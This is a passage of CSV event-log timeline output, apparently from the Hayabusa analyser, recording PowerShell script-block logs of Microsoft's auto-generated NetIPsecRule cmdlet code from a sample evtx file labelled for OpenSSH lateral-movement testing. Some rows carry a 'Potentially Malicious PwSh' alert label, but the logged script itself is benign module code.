${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) 